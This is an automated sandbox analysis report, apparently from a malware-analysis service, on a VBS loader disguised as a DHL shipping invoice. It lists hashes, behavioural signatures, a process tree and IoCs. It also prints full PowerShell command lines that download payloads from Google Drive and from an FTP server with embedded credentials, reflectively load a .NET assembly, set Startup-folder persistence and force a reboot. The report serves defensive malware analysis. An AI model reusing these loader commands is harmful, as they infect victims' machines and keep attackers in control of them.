Analysis
max time kernel
184s
max time network
186s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
15-10-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Shipping_Invoices_Awb_0000000.vbs
Resource
win7-20240903-en
Errors
General
Target
DHL_Shipping_Invoices_Awb_0000000.vbs
Size
544KB
MD5
f757be4bc8889174f9c6c45d6302e00d
SHA1
07028abbc63ce0ab275c0b495451c38c3f686358
SHA256
42f3a74c4a534ce4ac65b5e14474a905e8fbdcab70cc6d330ef763062b80a2a4
SHA512
8420a5fd3bc27a7ce403b989db088e40d1fdd7a8010159d9e3973160719dc0e32bc31500dc98d3a8ea020138f888d2a5013d7f57f0668b94cbf46b46de15a130
SSDEEP
1536:155555555555555555bMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMg:A
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures
Drops startup file (2 IoCs)
  - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DHL_Shipping_Invoices_Awb_0000000.vbs (powershell.exe)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DHL_Shipping_Invoices_Awb_0000000.vbs (powershell.exe)
  Processes: 1460 powershell.exe, 2832 powershell.exe, 2592 powershell.exe
Drops file in Windows directory (3 IoCs)
  - File created: C:\Windows\wusa.lock (wusa.exe)
  - File opened for modification: C:\Windows\Logs\DPX\setupact.log (wusa.exe)
  - File opened for modification: C:\Windows\Logs\DPX\setuperr.log (wusa.exe)
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  Processes: 2968 WScript.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: 2832 powershell.exe, 2592 powershell.exe, 2584 powershell.exe, 1460 powershell.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  - Token: SeDebugPrivilege, 2832 powershell.exe
  - Token: SeDebugPrivilege, 2592 powershell.exe
  - Token: SeDebugPrivilege, 2584 powershell.exe
  - Token: SeDebugPrivilege, 1460 powershell.exe
  - Token: SeShutdownPrivilege, 1632 shutdown.exe
  - Token: SeRemoteShutdownPrivilege, 1632 shutdown.exe
Suspicious use of WriteProcessMemory (18 IoCs; each of the six events below is logged three times)
  description                        pid   Process         procid_target
  PID 2968 wrote to memory of 2832   2968  WScript.exe     30
  PID 2832 wrote to memory of 2592   2832  powershell.exe  32
  PID 2592 wrote to memory of 2584   2592  powershell.exe  33
  PID 2584 wrote to memory of 1824   2584  powershell.exe  34
  PID 2592 wrote to memory of 1460   2592  powershell.exe  35
  PID 2592 wrote to memory of 1632   2592  powershell.exe  37
Processes
C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs"
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2968
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = '<obfuscated base64 string, assembled from fragments joined with [char]66, omitted>';$tcqrr = $qKKzc; ;$tcqrr = $qKKzc.replace('уЦϚ' , 'B') ;;$nnwch = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tcqrr ) ); $nnwch = $nnwch[-1..-$nnwch.Length] -join '';$nnwch = $nnwch.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs');powershell $nnwch
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2832
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
      - Drops startup file
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2592
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2584
        C:\Windows\system32\wusa.exe (depth 5)
          Command line: "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
          - Drops file in Windows directory
          PID: 1824
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1460
      C:\Windows\system32\shutdown.exe (depth 4)
        Command line: "C:\Windows\system32\shutdown.exe" /r /t 0 /f
        - Suspicious use of AdjustPrivilegeToken
        PID: 1632
C:\Windows\system32\LogonUI.exe (depth 1)
  Command line: "LogonUI.exe" /flags:0x0
  PID: 1900
C:\Windows\system32\LogonUI.exe (depth 1)
  Command line: "LogonUI.exe" /flags:0x1
  PID: 2140
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E4HB70LRDV0RN3KAG8H.temp
Filesize
7KB
MD5
a7d92fc0a80a03796e902f5321aefd23
SHA1
57186fc811b7e3c38e9a6c893b4813366c12f4a9
SHA256
41ee2239530d95f04923afa359dcb8192fa9880c79a3494917473f34cc1fb2b8
SHA512
17c9c3a7ea37c0995272c6679c241a448cbe8ba888c6d09cb33a404083c6006eb545528c7b8c6e77dd67e6129f8d6146fd914c0e92d0de1390a1affed69bda3e